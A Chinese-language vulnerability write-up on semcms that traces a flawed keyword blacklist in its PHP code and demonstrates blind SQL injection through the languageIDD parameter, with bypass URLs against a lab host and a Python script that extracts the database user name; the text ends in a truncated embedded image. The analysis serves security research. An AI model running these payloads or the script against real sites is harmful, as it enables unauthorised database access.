一、漏洞分析

  在分析过程中看到网上已经有人发现semcms V2.4存在过滤不严导致sql注入的漏洞,不知道咋还没改,而且最新版过滤的关键字更少了。

  首先查看首页文件index.php的代码

 <?php
include_once 'Include/web_inc.php';
include_once 'Templete/default/Include/Function.php';
$file_url="";
include_once 'Templete/default/Include/default.php';
?>

  可以看到包含了三个文件,跟进文件Include/web_inc.php中发现有可控变量$languageIDD

 //网站logo

 $weblogo=$web_url_meate.str_replace('../','',$row['web_logo']);

 // 控制文字标签 更改 获取的 语种 id

 if (isset($_GET["languageIDD"])){$Language=test_input(verify_str($_GET["languageIDD"]));}else{$Language=verify_str($Language);}

 if(!empty($Language)){

       //网站SEO设定

       $query=$db_conn->query("select * from sc_tagandseo where languageID=$Language");
$row=mysqli_fetch_array($query);
$tag_indexmetatit=datato($row['tag_indexmetatit']);// 首页标题

  在文件Include/web_inc.php的第7行中verify_str()和test_input函数会对变量$languageIDD进行处理,它们都位于文件include/contorl.php中,代码如下

 // 防sql入注

 if (isset($_GET)){$GetArray=$_GET;}else{$GetArray='';}     //所有GET方式提交的变量都进行防注入检查

 foreach ($GetArray as $value){ //get

     verify_str($value);

 }

 function inject_check_sql($sql_str) {

      return preg_match('/select|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str);    //过滤关键字
} function verify_str($str) { if(inject_check_sql($str)) { exit('Sorry,You do this is wrong! (.-.)');      //如果出现关键字则提示
} return $str;
}

。。。

 function test_input($data) {                   //防止XSS
$data = str_replace("<script", "", $data);
$data = str_replace("</script>", "", $data);
$data = str_replace("%", "percent", $data);
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data,ENT_QUOTES);    //实体编码
return $data; }

  可以看到第16行的函数verify_str()调用inject_check_sql()用来过滤危险字符,函数test_input用来过滤xss。其中可以明显地看到第11行的函数inject_check_sql()采用白名单的方式是有缺陷的,我们可以用布尔盲注来绕过

二、漏洞验证

  http://172.19.77.44/SEMCMS_PHP_3.5/index.php?languageIDD=1 and strcmp(left(user(),1), 0x72) rlike 0    显示正常

  

  http://172.19.77.44/SEMCMS_PHP_3.5/index.php?languageIDD=1 and strcmp(left(user(),1), 0x73) rlike 0    显示不正常

  

  参考网上已有的fuzz盲注脚本改了下,代码如下 

#用python3版本
import requests
url = "http://172.19.77.44/SEMCMS_PHP_3.5/index.php?languageIDD=1"
print("Testing url: " + url)
#十进制数33-126间的ascii hex值
payload = ["0x21","0x22","0x23","0x24","0x25","0x26","0x27","0x28","0x29","0x2a",
"0x2b","0x2c","0x2d","0x2e","0x2f","0x30","0x31","0x32","0x33","0x34",
"0x35","0x36","0x37","0x38","0x39","0x3a","0x3b","0x3c","0x3d","0x3e",
"0x3f","0x40","0x41","0x42","0x43","0x44","0x45","0x46","0x47","0x48",
"0x49","0x4a","0x4b","0x4c","0x4d","0x4e","0x4f","0x50","0x51","0x52",
"0x53","0x54","0x55","0x56","0x57","0x58","0x59","0x5a","0x5b","0x5c",
"0x5d","0x5e","0x5f","0x60","0x61","0x62","0x63","0x64","0x65","0x66",
"0x67","0x68","0x69","0x6a","0x6b","0x6c","0x6d","0x6e","0x6f","0x70",
"0x71","0x72","0x73","0x74","0x75","0x76","0x77","0x78","0x79","0x7a",
"0x7b","0x7c","0x7d"
]
user = ""
for b in range(len(payload)):
for a in payload:
#sql_payload_user = " and strcmp(substr(database(),%s,1), 0x%s) rlike 0" % (b+1, a.replace("0x","")) #当前数据库名称
sql_payload_user = " and strcmp(substr(user(),%s,1), 0x%s) rlike 0" % (b+1, a.replace("0x","")) #当前数据库用户名
res = requests.get(url + sql_payload_user).text
res1 = requests.get(url).text
if len(res) == len(res1): #如果返回的内容长度大小一样,则表示匹配成功
user = user + a
print(" ")
print("[*]info : 0x" + user.replace("0x","").upper())
break
else:
print('\r',"Match failed,Next.....",end='')

  测试结果如下图

  aaarticlea/png;base64,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